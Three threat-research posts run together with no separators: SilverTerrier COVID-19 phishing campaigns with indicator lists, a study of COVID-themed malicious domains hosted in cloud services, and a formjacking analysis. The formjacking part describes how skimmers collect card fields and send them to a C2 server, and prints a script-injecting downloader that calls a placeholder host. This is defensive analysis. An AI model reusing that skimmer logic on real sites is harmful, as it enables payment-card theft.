In examining the connection between Actor 1, Nigerian cybercrime, and these first four phishing campaigns, we found that when malware linkages from these campaigns and historical BEC activity were overlaid with insights afforded by a weakness in Lokibot malware (Malbeacon data), several interesting connections emerged (Figure 2). While not definitive in attributing all of this activity to Actor 1, these connections chart a path originating with Actor 1’s infrastructure, through the infrastructure for these new COVID-19 campaigns, and back to Nigeria.

At the top of our analysis, we start with four European Union (.eu) domains that are directly attributed to Actor 1’s previously identified BEC activity. Solid lines connecting the domains and IP addresses are based on insights provided by the actor’s employment of Lokibot malware, while dashed lines represent the existence of malware samples that connect to both domains. Following the link to hojokk[.]com, we discovered malware hosted in a folder called “MMC.” While we lack insight into Actor 1’s middle name, his first and last initial are coincidently “MC.” Moreover, following additional connections to and from this domain, we discovered several links to Nigeria, as well as malware overlap with posqit[.]net, which we will discuss further in a subsequent campaign below.

Focusing on mecharnise[.]ir, we found malware overlaps with two of Actor 1’s domains. Moreover, we discovered shared Lokibot malware connections to two specific Nigerian IP addresses that both overlap with petroindonesia[.]co[.]id.

Figure 3. Infrastructure connections for campaigns 1-4
Campaign 5

Using these connections as a starting point, we then began our analysis of campaign five, which began on March 26, 2020. Similar to the previous campaign, we noted multiple malware samples and sending accounts, to include spoofing a clinical research organization in the United States.

The first email was seen by a single customer and was packaged once again as a purchase order form for COVID-19-related products. An Excel document was attached and configured to exploit the CVE 2017-11882 vulnerability in order to download and run an executable file mapped to systemserverrootmapforfiletrn[.]duckdns[.]org. Similar to previous campaigns, the downloaded file then connected over SMTP to an account at mailhostbox[.]com. Additionally, it’s worth noting that the Excel attachment was seen in a separate BEC style campaign the same day (see Figures 4. and 5.) and that the document also contained the blurred title of “Galaxy International Trading Limited,” consistent with the fourth campaign. Since the exact same file was sent in multiple phishing campaigns using different themes on the same day, we can assert with greater confidence that these attacks are connected.

Figure 4. Separate BEC Campaign with the Same Attachment
Figure 5. Campaign 5 Sample Sent from Spoofed US Clinical Research Org. - PO For-COVID-19 ProductS.xlsx

On March 29, 2020, a second phishing email was sent to a government agency in the United States with the same subject and filename. However, this time the attachment was AgentTesla malware packaged as an executable file that, once again, connected to an account at mailhostbox[.]com for command and control. Furthermore, this email was sent from the domain reynoldsgh[.]com which maintains an active website that appears incomplete and is potentially fraudulent, with a Ghana phone number listed under contact information.

Figure 6. Screenshot of reynoldsgh[.]com
The third series of emails arrived on April 6, 2020. Sent to a medical publishing company in Europe and a government agency in the United States, this email also included a sample of AgentTesla malware configured to use SMTP for communication with an account at mailhostbox[.]com.

Table 5. Indicators from the fifth campaign
Campaign 6

Following an emerging trend of using Dynamic DNS services offered by DuckDNS, on March 30, 2020 we identified a single phishing email disguised as a vessel delay letter from a potentially spoofed shipping company in Singapore. A Word document was attached to the email with a CVE 2017-11882 exploit that called out to kungfrdyeducationalinvestment8agender[.]duckdns[.]org to download another document, and an executable file assessed to be Formbook malware, based on a report by Infoblox.

Table 6. Indicators from the sixth campaign

Dynamic DNS Clusters

Deriving linkages from the connections used in campaigns four through six proved exceptionally challenging because of the function and anonymity afforded by dynamic DNS services. However, by pivoting through several layers of obfuscation, we identified three clusters of DuckDNS hosts with links to Nigeria. While it is difficult to attribute all of this activity directly to Actor 1, the malware overlap seen in the third campaign with mecharnise[.]ir, combined with malware packaging similarities (CVE-2017-11882) and a Nigerian nexus, all lead us to believe that this activity is likely related within one or two degrees of separation from Actor 1.

Starting with metadefenderinternationalsolutionfor[.]duckdns[.]org from the fourth campaign, we quickly found an initial cluster of five hosts that were all related based on an IP connection and their creation dates. Coincidently, this cluster included another host with a COVID-19-related name seen in the fifth campaign: systemserverrootmapforfiletrn[.]duckdns[.]org. Researching these hosts, we found several additional samples of malware packaged as Microsoft Word and Excel documents with the CVE-2017-11882 vulnerability and also found additional malware overlaps.

Table 7. Dynamic DNS Cluster 1

Further analysis of the IP address connection revealed a second cluster of hosts linked to an additional 71 samples of malware with traditional BEC themes.

Table 8. Dynamic DNS Cluster 2

Following the malware link between cluster 1 and 23[.]95[.]132[.]48, we discovered that this IP address provided command and control for over 200 samples of Lokibot malware. The vast majority of these samples were configured to call back to a dynamic DNS host in order to download an executable file, before calling out to the IP address for command and control. Pivoting from these samples, we identified a third cluster containing 48 hosts with consistent naming patterns. Interestingly, records show that many of these hosts were established within days of the second cluster, and while they point towards IP addresses in Vietnam, they were initially established using Nigerian infrastructure.

Table 9. Dynamic DNS Cluster 3

Reviewing the list of hosts in cluster three, the following naming conventions stand out: chnes, engine, kung, russchine, shgshg, and tesco. However, most notably cluster three includes kungfrdyeducationalinvestment8agender[.]duckdns[.]org which we observed in the sixth campaign above.

Figure 7. Infrastructure connections between campaigns
Campaign 7

A seventh campaign was launched spanning April 7th and 8th 2020, in which two samples of NanoCore RAT were packaged as compressed RAR files with a vaccine-related lure. These samples were sent to several organizations including a government health agency and two universities with medical programs in the United States, as well as a Canadian health insurer.

Table 10. Indicators from the seventh campaign

Connecting this campaign to Actor 1, we found malicious activity originating from the domain ladbible[.]com dating back to mid-January. Tracing the earliest activity back to Nigerian origins, we also discovered that less than two weeks prior to this campaign, this domain was used to distribute a sample of Lokibot malware. That sample called back to two domains previously attributed to Actor 1 (sylvaclouds[.]eu and hokokk[.]com) and outlined in Figure 3 above.

Campaign 8

On April 8, 2020, we witnessed the most recent campaign by this actor. Distributed broadly, targets of this campaign included a government health agency, state infrastructure, and a health insurance company in the United States, in addition to a university and regional government in Italy, and various government institutions in Australia. Disguised as COVID-19 relief materials coming from a “Thai Medical Department,” these phishing emails were delivered with one of two samples of Lokibot malware designed to call out to 185[.]126[.]202[.]111 for command and control. As seen in Figure 3 above, analysis performed on this IP address identified malware overlap with dynamic DNS clusters one and three.

Table 11. Indicators from the eighth campaign

Actor 2

Separate and distinct from the campaigns above, we identified a single campaign associated with the name of Alhaji. Between March 17th and 18th, 2020, two samples of Lokibot malware were sent to several organizations, including a government health agency in the United States. These samples called out academydea[.]com/alhaji/Panel/five/fre[.]php for command and control. Upon researching this domain, we discovered an additional 16 samples of malware used in the previous month. Further, leveraging insights from a vulnerability in Lokibot malware, we were able to trace this activity back to Nigerian IP addresses.

Table 12. Indicators from Actor 2’s campaign

Actor 3

Between March 23rd and 24th, 2020, a SilverTerrier actor using the name Black Emeka launched a series of emails containing malicious attachments. Disguised as COVID-19 information, these emails originated from the domain welheadcontrol[.]com, which is registered to the actor. The attached malware samples use PowerShell to download malicious executable files from the domain goldenlion[.]sg, which resolves to an active website for Golden Lion Technology PTE LTD in Singapore. While likely not a coincidence, the website advertises Goldhofer equipment, while this actor is also the registered owner of the typo variant domain goldhhofer[.]com.

Figure 8. Advertising for Goldhofer on goldlion[.]sg
Table 13. Indicators from Actor 3’s campaign

Conclusion

As 2020 progresses, the most prominent threat facing customers is commodity malware deployed in support of sophisticated BEC schemes. Given the global impacts of COVID-19, SilverTerrier actors have begun adapting their phishing campaigns and will likely continue to use COVID-19-themed emails to deliver commodity malware broadly in support of their objectives. In light of this trend, we encourage government agencies, healthcare and insurance organizations, public utilities, and universities with medical programs to apply extra scrutiny to COVID-19-related emails containing attachments. While organizations with appropriate spam filtering, proper system administration, and up-to-date Windows hosts have a much lower risk of infection, we further encourage administrators to validate installation of the Microsoft patch for CVE 2017-11882.

Additionally, Palo Alto Networks customers benefit from the following:

Cortex XDR protects endpoints from all malware, exploits and fileless attacks associated with SilverTerrier actors.
WildFire® cloud-based threat analysis service accurately identifies samples associated with these malware families.
Threat Prevention provides protection against the known client- and server-side vulnerability exploits, malware, and command and control infrastructure used by these actors, including CVE 2017-11882.
URL Filtering identifies all phishing and malware domains associated with these actors and proactively flags new infrastructure associated with these actors before it is weaponized.
Users of AutoFocus™ contextual threat intelligence service can view malware associated with these attacks using the SilverTerrier tag.

Indicators of Compromise

Malware Samples

3335ebffd8b4ab739db99f68cd6d79caa39c1210c274bbe4166194cc26de4123

e365100468e9472518d1875796932a8085ab29f6bbfe3357928fa9cc6187628b

27d601ef1a2b340b6b644493a627064f60ad8a95271248e00f7bb54a59abb069

563b1c6252612d06b714bf29b9f53f7aade4c7ac6658b2d0c774a7e244ea83da

0ae2aaeb2938cf4c777be4aa192e4994020609f5640add8e7296de9ff34eb227

4b8b49bdfa435d0faba2e3964b04e20bbfc86aa4ffc3c3b8e1449894892f125b

589a1900b210826e97ec8da3c5c40f707963146e934393eb15e1b07a1398912c

7f661c6f5ebba3eca82e1dbf1a96e27f2503da405093464538d90dc113a7b439

f7183d3a992ead2bf194ac46b1f6f70ad9e30bfd5b6065ffbd96a3529c311725

83457e2b8f9209ec1c987b1a0bee65140cc41d1d59ed38f1d1ad160ea0d1d13c

b58e386928543a807cb5ad69daca31bf5140d8311768a518a824139edde0176f

c5c43b340957830f5d7484ce06f9de0ef593d88f3d48c09cd2150e670661f672

f7b9219f81772e928ab0fbd0becbcf10ca3792ce211bb4a7fa68b41050bdb220

241f09feda09dc33b86e23d317bc2425f4d43b91221815caa5eb055a9a97be74

31d2ef10cad7d68a8627d7cbc8e85f1b118848cefc27f866fcd43b23f8b9cff3

7b2512d06723cc29f80ae8c8d6df141f27bc9d962ae76b5651b84d7be4379bba

aff38fe42c8bdafcd74702d6e9dfeb00fb50dba4193519cc6a152ae714b3b20c

8f56fb41ee706673c706985b70ad46f7563d9aee4ca50795d069ebf9dc55e365

da26ba1e13ce4702bd5154789ce1a699ba206c12021d9823380febd795f5b002

1ee6646e0ea9ceb6fa1721f809bd3cdaeb38c6b2bdd7171b340097c237527568

d731fb3fcc6ecd266251408a282ef4409eac94ce25cecadbfcb2df08e7ca7693

d80a440755dc15803db459b15b991d1abe81054f0942d054d965a578b92917b7

8037a8e12e8cacdaca24b993ffdbd8cdc63ec29dd78eee136083fa09049dbf0c

Domains:

academydea[.]com

coffiices[.]com

goldenlion[.]sg

ladbible[.]com

mecharnise[.]ir

mikeservers[.]eu

modcloudserver[.]eu

petroindonesia[.]co[.]id

posqit[.]net

reynoldsgh[.]com

sylvaclouds[.]eu

uzoclouds[.]eu

welheadcontrol[.]com

Dynamic DNS Hosts:

12kungwsdyducationaldeveloperinvestmenty[.]duckdns[.]org

6uniteddefenceforstdygorvermentsocialeme[.]duckdns[.]org

americanmicrosoftclouddepartment[.]duckdns[.]org

antipiracydetectorganisationforwsdy3film[.]duckdns[.]org

bbchenkotsdywoolandpappercompanybnhs5[.]duckdns[.]org

chinoex2onlineantibullyandgeneralxpstdy5[.]duckdns[.]org

chnes9wealthandstdyorganisationsumit[.]duckdns[.]org

chneswealstdy8thandorganisationjokbo[.]duckdns[.]org

chneswealthandorganisationstdy7joppl[.]duckdns[.]org

chneswsdy13wealthandmoduleorganisationrn[.]duckdns[.]org

chneswsdy8wealthandorganisationjokbo[.]duckdns[.]org

chnfrndsecurityandgorvermentstdy1socialf[.]duckdns[.]org

chnfrndsub1inteligentangencysndy4project[.]duckdns[.]org

chnfrndtsdysecurityandgorvermentsocialjf[.]duckdns[.]org

chnfrndwsdy1securityandgorvermentsocialf[.]duckdns[.]org

cloudfilesharingdomainurllinksys[.]duckdns[.]org

crimedetectivefor1stdygorvermentndsocial[.]duckdns[.]org

empowermentorganisationstday1government[.]duckdns[.]org

engin3worldstdydevelopmentandtechnology[.]duckdns[.]org

engintsdy3worlddevelopmentandtechnology[.]duckdns[.]org

fileexchangeserverprotocolsystemintergra[.]duckdns[.]org

filegotosecureothers[.]duckdns[.]org

frndgreen1frdycreamcostmeticsladiesshop[.]duckdns[.]org

frndgreen3creamwsdycostmeticsbabystored[.]duckdns[.]org

globaltransfersecurefilethroughcloud[.]duckdns[.]org

green9wsdyelectronicsandkitchenappliance[.]duckdns[.]org

investmenteducationkungykmtsdy8agender[.]duckdns[.]org

kung11ducationalstdydeveloperinvestmenty[.]duckdns[.]org

kung13eduationalstdydeveloperinvestmenty[.]duckdns[.]org

kungeducationalinvestment8tusdyagender[.]duckdns[.]org

kungfrdyeducationalinvestment8agender[.]duckdns[.]org

kungglobalinvestmenteductgpmstdy8addres[.]duckdns[.]org

kungglobalinvestmentjpjeductaddres5stdy[.]duckdns[.]org

kungglobalinvestmentjpjwsdy6eductaddres[.]duckdns[.]org

kungstdy7globalinvestmentjmpeductaddres[.]duckdns[.]org

kungwsdy7globalinvestmentjmpeductaddres[.]duckdns[.]org

livevideoremoteconference[.]duckdns[.]org

mastervisacloudesystemprtomicrosftwareus[.]duckdns[.]org

msofficeinternatiinalfilecloudtransfer[.]duckdns[.]org

msofficewordfiletransfertotheadmintrue[.]duckdns[.]org

office365securefilegatewaytransfer[.]duckdns[.]org

omentradinginternationalprivateltd[.]duckdns[.]org

prodigtsdy5organizationalcompanygroupin[.]duckdns[.]org

russchine2specialstdy1plumbingmaterialsv[.]duckdns[.]org

russchine2specialstdy2plumbingmaterialgh[.]duckdns[.]org

russchine2wsdy1specialplumbingmaterialsv[.]duckdns[.]org

russchine2wsdyspecial6plumbingjkmaterial[.]duckdns[.]org

shgshg13nationalwsdyobjindustrialatempt[.]duckdns[.]org

shgshg9nationalobjwsdyindustrialgoogler[.]duckdns[.]org

shgshgnationalindustrialwsdy8googleklm[.]duckdns[.]org

shgshgnationalobjindustrialstdy10atempt[.]duckdns[.]org

shgshgnstdy7ationalindustrialgoogleklm[.]duckdns[.]org

shgshgstdy9nationalobjindustrialgoogle[.]duckdns[.]org

silentexploitfileexchangerzeroday[.]duckdns[.]org

tescogroseryand1wsdayelectronicstorehome[.]duckdns[.]org

tescohomegroseryandelectronicstday2store[.]duckdns[.]org

tescostday1groseryandelectronicstorehome[.]duckdns[.]org

webxpostdytechnologyhardsoftware5buyers[.]duckdns[.]org

wewewewewesesesesasbacwederffggffddsss[.]duckdns[.]org

windowsdefenderwithfiewallprotocolsecure[.]duckdns[.]org

windowsfirewallprotcolsecuritysystem[.]duckdns[.]org

worldengindevelopnw7stdymenttechnology[.]duckdns[.]org

IP Addresses:

23[.]95[.]132[.]48

185[.]126[.]202[.]111

Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org.


COVID-19: Cloud Threat Landscape

Executive Summary

Unit 42 researchers analyzed 1.2 million newly observed hostnames (NOH) containing keywords related to the COVID-19 pandemic from March 9, 2020 to April 26, 2020 (7 weeks). 86,600+ fully qualified domain names are classified as “high-risk” or “malicious” (C2, malware, or phishing), spread across various regions, as shown in Figure 1. The United States has the highest number of malicious domain names (29,007), followed by Italy (2,877), Germany (2,564), and Russia (2,456).

Unit 42 researchers found that 56,200+ of the NOHs are hosted in one of the top four cloud service providers (CSPs): Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), and Alibaba. They break down as follows:

    • 70.1% in AWS
    • 24.6% in GCP
    • 5.3% in Azure 
    • <0.1% in Alibaba

During our research, we noticed that some malicious domains resolve to multiple IP addresses, and some IP addresses are associated with multiple domains. This many-to-many mapping often occurs in cloud environments due to the use of content delivery networks (CDNs) and can make IP-based firewalls ineffective. Some important findings in this research are:

    • On average, 1,767 high-risk or malicious COVID-19 themed domain names are created every day.
    • Of the 86,600+ domain names, 2,829 domain names hosted in public clouds are found as high-risk or malicious
      • 79.2% in AWS
      • 14.6% in GCP
      • 5.9% in Azure
      • 0.3% in Alibaba
    • Adversaries are disguising malicious activities such as phishing and malware delivery in the cloud.
    • The higher price and more rigorous screening/monitoring process is likely making malicious actors less willing to host malicious domain names in public clouds.

Threats originating from the cloud can be more difficult to defend against because malicious actors leverage cloud resources to evade detection and amplify the attack. Organizations need a cloud-native security platform and a more advanced application-aware firewall to secure their environments. Palo Alto Networks continuously monitors malicious newly observed hostnames. Prisma Cloud and VM-Series both provide layer-7 firewall capabilities in cloud environments to prevent malicious activities from these domain names.

Figure 1. 86,600+ high-risk or malicious domain names related to COVID-19 were observed in seven weeks.

COVID-19 Themed Domain Names

The COVID-19 related domain names studied in this research were obtained from the RiskIQ dataset. The dataset keeps track of newly observed domain names that contain keywords related to COVID-19, including “coronav”, “covid”, “ncov”, “pandemic”, “vaccine,” and “virus.” From March 9th to April 19th, 1.2M domain names were observed with one of these keywords. 86,607 domain names are categorized as high-risk or malicious by Palo Alto Networks URL Filtering. A site is classified as malicious if command and control (C2), malware distribution, or phishing is observed. A site is classified as high-risk if it was previously confirmed to be malicious, is hosted on bulletproof ISPs, or shares domains with other malicious sites. We enriched the dataset using Palo Alto Networks URL Filtering, AutoFocus, the WHOIS database, and IP geolocation. Note that due to the size of the dataset, we were unable to individually verify the relationship between each domain name and the COVID-19 pandemic.

Figure 2 describes the number of NOHs containing each keyword and the number of these NOHs observed every week. Figure 3 illustrates the types of malicious domain names identified in the dataset. On average, 1,767 high-risk or malicious COVID-19 related domain names are created every day. Figure 1 visualizes where the malicious domain names are hosted. The United States has the highest number of high-risk or malicious domain names (29,007), followed by Italy (2,877), Germany (2,564), and Russia (2,456).

Figure 2. Newly observed hostnames containing COVID-19 related keywords from March 9, 2020 to April 26, 2020.

Figure 3. Three types of malicious activity identified by Palo Alto Networks URL Filtering

COVID-19 NRDs in Public Clouds

When focusing on the cloud-hosted domain names, 56,212 of the NOHs are hosted in one of the top 4 cloud service providers, AWS, Azure, GCP, or Alibaba. 39,494 (70%) of these domain names are hosted in AWS and only 61 (0.1%) of the domain names are hosted in Alibaba. Palo Alto Networks identified 2,829 cloud-hosted NOHs classified as “high-risk” or “malicious.” Figure 4 shows the distribution of NOHs across the 4 CSPs. The left plot is the distribution of all cloud-hosted NOHs, and the right plot is the distribution of “malicious” NOHs in public clouds. Note that Alibaba does not appear in the plot due to its low percentage (< 0.5%). It is interesting to see that only 5% of the NOHs hosted in public clouds are found to be high-risk or malicious, while 7.5% of NOHs across the entire internet are found to be high-risk or malicious. We speculate that the higher price and more rigorous screening/monitoring process may make malicious actors less willing to host malicious domain names in public clouds. Note that researchers did not investigate why a large volume of NOHs were hosted on AWS as compared to other prominent CSPs. Nothing discovered during the analysis indicated a fundamental vulnerability.

Figure 4. Distribution of NOHs in public clouds.

During the analysis of cloud-hosted malicious domains, we noticed that multiple domains may resolve to a single IP, and a single domain may be associated with multiple IPs. The first scenario often occurs when the domains are hosted in a CDN, such as Amazon CloudFront or Cloudflare. In a CDN, hundreds or thousands of domains in a nearby geographical location may resolve to the same IP of an edge server. CDNs reduce network latency and improve service availability by caching static web content on edge servers. However, because a malicious domain shares the same IPs as benign domains in the same CDN, the CDN also acts as cover for malicious domains. In our analysis, a Cloudflare IP 23.227.38[.]64 is associated with more than 150 risky or malicious domains, e.g., covid-safe[.]shop, cubrebocascovid[.]com, www.covidkaukes[.]lt, protection-contre-le-coronavirus[.]com. In the same dataset, more than 2,000 other benign domains also resolve to the same IP.

In the second scenario, when a single domain name resolves to multiple IPs, the domain name may have a set of redundant hosts all serving the same content, or the domain name may again be hosted in a CDN. If a domain name has multiple redundant hosts, DNS will hold multiple A records for this domain name. If a domain name is hosted in a CDN, the domain name can resolve to different IP addresses based on the client's location: the IP of the closest edge server is returned when a client queries DNS servers for this domain name. In our analysis, the domain name covid19-fr.johanrin[.]com resolves to 28 different IPs, each belonging to an Amazon CloudFront edge server, e.g., 52.85.151[.]68, 99.84.191[.]82, 13.249.44[.]82, 54.192.30[.]118.

This many-to-many domain name to IP mapping makes it difficult to block malicious domain names by IP addresses. A denylisted IP in a layer-3 firewall may fail to block the traffic to/from a malicious domain while unintentionally making many other benign domain names unreachable. A more intelligent layer-7 firewall is necessary to inspect the domain names in the application layer and selectively pass or block sessions.
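To make the cost of the layer-3 approach concrete, the following added example (not code from the Unit 42 report) models the two mapping scenarios above with constructed DNS resolution records and measures what a single-IP denylist entry actually achieves compared with a name-based block. Every domain, IP address and verdict in RECORDS is constructed for the example; none is an indicator from the research, and the function names are my own.

```javascript
// Added example (not code from the Unit 42 report): models the many-to-many
// domain/IP mapping described above with constructed resolution records and
// measures what an IP-level (layer-3) block achieves compared with a
// name-level (layer-7) block. Every domain, IP and verdict is constructed.
const RECORDS = [
  // Case 1: one CDN edge IP shared by malicious and benign domains.
  { domain: "covid-deals.invalid",  ip: "203.0.113.10", verdict: "malicious" },
  { domain: "vaccine-shop.invalid", ip: "203.0.113.10", verdict: "malicious" },
  { domain: "bakery.invalid",       ip: "203.0.113.10", verdict: "benign" },
  { domain: "florist.invalid",      ip: "203.0.113.10", verdict: "benign" },
  { domain: "library.invalid",      ip: "203.0.113.10", verdict: "benign" },
  // Case 2: one malicious domain answered from several edge IPs.
  { domain: "covid19-info.invalid", ip: "198.51.100.1", verdict: "malicious" },
  { domain: "covid19-info.invalid", ip: "198.51.100.2", verdict: "malicious" },
  { domain: "covid19-info.invalid", ip: "198.51.100.3", verdict: "malicious" },
  { domain: "news.invalid",         ip: "198.51.100.2", verdict: "benign" },
];

// Distinct domains cut off if this single IP is denylisted, split by verdict.
function ipBlockImpact(records, ip) {
  const byVerdict = verdict => new Set(
    records.filter(r => r.ip === ip && r.verdict === verdict).map(r => r.domain));
  return { ip, malicious: byVerdict("malicious").size, benign: byVerdict("benign").size };
}

// Every IP a domain resolves to: all of them must be blocked for an IP-based
// rule to make the domain unreachable, and a CDN may add more at any time.
function ipsServingDomain(records, domain) {
  return [...new Set(records.filter(r => r.domain === domain).map(r => r.ip))].sort();
}

// Layer-3 plan: one rule per IP that hosts anything malicious, each annotated
// with the number of benign domains the rule would also break.
function ipBlockPlan(records) {
  const ips = [...new Set(records.filter(r => r.verdict === "malicious").map(r => r.ip))].sort();
  return ips.map(ip => ipBlockImpact(records, ip));
}

// Layer-7 plan: block by name, so benign neighbours on a shared IP are untouched.
function domainBlockPlan(records) {
  return [...new Set(records.filter(r => r.verdict === "malicious").map(r => r.domain))].sort();
}

// Collateral damage of the layer-3 plan: benign domains that become unreachable.
function collateralDomains(records) {
  const blockedIps = new Set(ipBlockPlan(records).map(p => p.ip));
  return [...new Set(
    records.filter(r => r.verdict === "benign" && blockedIps.has(r.ip)).map(r => r.domain))].sort();
}
```

On this data the layer-3 plan needs four IP rules, one of which (the shared CDN edge) breaks three benign sites for two malicious ones, while the layer-7 plan is three hostnames with no collateral; that is the asymmetry the paragraph above describes.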

Conclusion

Cyber threats are evolving rapidly and leveraging real-world events to deceive victims. With COVID-19 driving a surge in cloud adoption, we see not only attacks targeting the cloud users but also threats originating from the cloud. With thousands of malicious domains coming online every day, it is imperative to protect every endpoint with continuous monitoring and automatic threat prevention tools because cloud-hosted applications and services are exposed to the same threats as non-cloud endpoints. The problem becomes even more complicated when working in a multi-cloud environment. Due to the complexity of cloud management, user-induced misconfigurations lead to the most security incidents. Cloud Native Security Platforms (CNSPs) help organizations monitor and secure resources across multiple cloud providers, workloads and hybrid cloud environments.

Palo Alto Networks customers are already protected from these threats by:


Anatomy of Formjacking Attacks

Executive Summary

The rise of the Internet has contributed positively to people's lives in many ways, and almost any service can now be found online. However, the convenience of the internet also opens a gate for malware that steals people's confidential information, and unfortunately more and more malware authors are taking advantage of this.

Formjacking, where cybercriminals inject malicious JavaScript code to hack a website and take over the functionality of the site's form page to collect sensitive user information, is one of the fastest growing forms of cyber attack. It is designed to steal credit card details and other personal information from payment forms that are captured on the “checkout” pages of e-commerce websites.

When a user unknowingly visits a compromised shopping website, they put items in their cart and go to checkout, entering their credit card information (e.g. name, address, email, credit card number, CVV, expiration date, etc.) on the checkout page. When they click the "checkout" or "submit" button, malicious code collects the user's input and sends it to an attacker’s Command & Control (C2) server. The original purchase request is unaffected by this and the user receives their products as expected. Many large websites have been compromised using this technique, such as British Airways, Ticketmaster, Delta, Newegg and Topps.com Sports Collectibles.

The process flow is in Figure 1, below:

Figure 1. Formjacking process flow

Writing formjacking code and deploying it to a compromised site is not very difficult for an attacker to do and allows them to steal credit card information quickly and easily without needing to deploy malware or compromise a system.

This makes it very attractive for attackers, especially considering e-commerce service is very popular today.

This blog provides a deep-dive into how formjacking code works. Palo Alto Networks customers are protected from this type of attack: WildFire detects and correctly identifies formjacking attacks as malicious and PANDB also identifies the URLs as malicious.

Typical Formjacking Attack

Below is a typical formjacking sample, which as of April 8, 2020 was only detected as malicious by three entities in VirusTotal. (SHA256:a79da1f007cfc88e4f8ae13623e2b752d2da03bcf9d51a74ea1fca2e6e6fca14)

The code is very long and highly obfuscated; we had to deobfuscate it before we were able to read it. Below is part of the original code.

At first, we can see the basic construct is:

Taking var1 as an example, we break it down into three parts:

  • ["W*![EnTa/mKelU*R=R'3/ngu8mpe/rqxo7N_EcglaDrvtla5qoK'!]" is the first part and is an encrypted string.
  • [(785034646 * "kNL7xIvgS.\x85j}_K=" ["charCodeAt"](2) + 22.0)["toString"](("Y^8ZH/D:0$or5<+\x8aqU" ["charCodeAt"](3) * 0 +36.0))] is the second part.
    1. We can calculate (785034646 * "kNL7xIvgS.\x85j}_K=" ["charCodeAt"](2) + 22.0) to get 59662633118.
    2. We can also calculate ("Y^8ZH/D:0$or5<+\x8aqU" ["charCodeAt"](3) * 0 +36.0)) to get 36.
    3. So the second part is the same as (59662633118).toString(36), which evaluates to the string "replace" (see the Number.prototype.toString documentation for radix conversion).
  • (/[\!8ET\/WNl5vRDpgUqKx37]/g, "") is the third part, a regex pattern.

Since var1 is the same as "xxxxx".replace(/[\!8ET\/WNl5vRDpgUqKx37]/g, ""), the regex simply strips the junk characters from the encrypted string. After decryption, var1 is "*[name*='numero_cartao']".
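To make the decoding reproducible, here is an added example (not code from the original post) that re-implements the two layers just described in plain JavaScript: the base-36 number-to-method-name trick and the junk-character regex. The constants are the ones quoted above; the function names (hiddenNumber, base36Name, decodeVar1 and so on) are my own, and nameToBase36 goes one step beyond the post by inverting the trick so an analyst can build a signature for any hidden method name.

```javascript
// Added example (not code from the Unit 42 post): re-implements the two
// obfuscation layers described above so an analyst can decode them offline.
//
// Layer 1: a property name is hidden as (bigNumber).toString(radix), where
//          both the number and the radix come from charCodeAt() arithmetic
//          on junk strings.
// Layer 2: the real string is padded with junk characters that the recovered
//          "replace" call strips with a character-class regex.

// Reproduces the arithmetic in the second part of var1.
function hiddenNumber() {
  return 785034646 * "kNL7xIvgS.\x85j}_K=".charCodeAt(2) + 22.0; // 'L' is 76
}

function hiddenRadix() {
  return "Y^8ZH/D:0$or5<+\x8aqU".charCodeAt(3) * 0 + 36.0; // the * 0 is padding
}

// Any integer rendered in base 36 spells a lowercase identifier; this is how
// the sample smuggles method names past string-based scanners.
function base36Name(n, radix = 36) {
  return n.toString(radix);
}

// Inverse: the integer an obfuscator would need to hide a given method name.
// Useful when writing detection content for other hidden names.
function nameToBase36(name) {
  return parseInt(name, 36);
}

// Layer 2: the sample calls "junk".replace(/[...]/g, ""), so applying the
// same regex recovers the plaintext.
function stripJunk(encrypted, junkClass) {
  return encrypted.replace(junkClass, "");
}

// Ties the three parts of var1 together exactly as the obfuscated code does:
// encrypted[method](regex, ""), with the method name resolved at runtime.
function decodeVar1() {
  const encrypted = "W*![EnTa/mKelU*R=R'3/ngu8mpe/rqxo7N_EcglaDrvtla5qoK'!]";
  const method = base36Name(hiddenNumber(), hiddenRadix()); // "replace"
  const junk = /[\!8ET\/WNl5vRDpgUqKx37]/g;
  return stripJunk(encrypted, junk) === encrypted[method](junk, "")
    ? encrypted[method](junk, "")
    : null;
}
```

Running decodeVar1() yields the selector quoted above; the same two helpers, with the sample's other constants substituted, decode the remaining var strings in the script.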

Finally we can deobfuscate the above code to below:

Below is another part of the original code.

We can deobfuscate the above to get the below code:

Now, let’s deobfuscate the original core code, shown below.

Now we can figure out the main flow of events:

  1. It creates listeners on the "DOMContentLoaded" and "load" events, so once a page finishes loading it executes the sHv function, which creates a timer to execute the yFj function every 7 seconds.
  2. The yFj function scans the page for payment-related buttons using the selectors "button[onclick*='.save']" and "button[class*='checkout']". If one exists, it attaches "click" and "mousedown" listeners with the event handler function zTI.
  3. When a user clicks a matching button, the zTI function is triggered. It collects the values of the HTML elements matched by the following selectors via document.querySelector (see the pa4 function); these values include the credit card information:
    • window["payment_checkout1"] = ["*[name*='numero_cartao']", "input[id*='cc_number']", "*[name*='cc_num']"]
    • window["payment_checkout2"] = ["*[name*='expiracao_mes']", "*[name*='cc_exp_m']", "*[name*='expirationMonth']"]
    • window["payment_checkout3"] = ["*[name*='expiracao_ano']", "*[name*='cc_exp_y']", "*[name*='expirationYear']"]
    • window["payment_checkout4"] = ["*[name*='codigo_seguranca']", "input[id*='cc_cid']", "*[name*='cc_cid']"]
  4. It then calls the hZy and F8S functions to encrypt the collected data.
  5. Finally, it calls the wIW function to send the data to the remote server.

The main process flow is shown below in Figure 2.

Figure 2. Formjacking code flow

Put simply, it listens for the “click” event; once you click, it collects all the payment information you filled in on the form and sends it to the C2 server.

An Advanced Example

An advanced formjacking sample can hide itself more craftily, which makes it much harder to track. We use the sample with the SHA256 below for this analysis.

(SHA256: 5775efac071288ff6632056635f285b03bf2ab6d6dee1fd902555e256fe63119)

At a glance it is not hard to read: the code is only a few lines.


The four steps above are:

  1. Create a PFG variable, which is a string constructor function.
  2. Use a loop to decrypt the stage 2 code and assign it to the qKn variable.
  3. Overwrite the hAn.toString function with the PFG.constructor(qKn).constructor.
  4. Execute the hAn.toString() function so it will execute "xxx".constructor(qKn).constructor(), which will execute qKn as code. In step 2, qKn was assigned as the stage 2 code.

Next we analyzed the stage two code, hash shown below.

(SHA256:1e4300dff5e0978092102028487c08267b74fb3beef14faa56b0f1a3fbc53ae4)

It uses the "regex" obfuscation we described above. After deobfuscation, we can see it is only a downloader, as it only:

  1. Creates a DOM element: cdn=document.createElement("script")
  2. Sets the element source url to: cdn.src="hxxps://xxxxxx[.]com/js/content.js";
  3. Appends this element to the DOM tree.

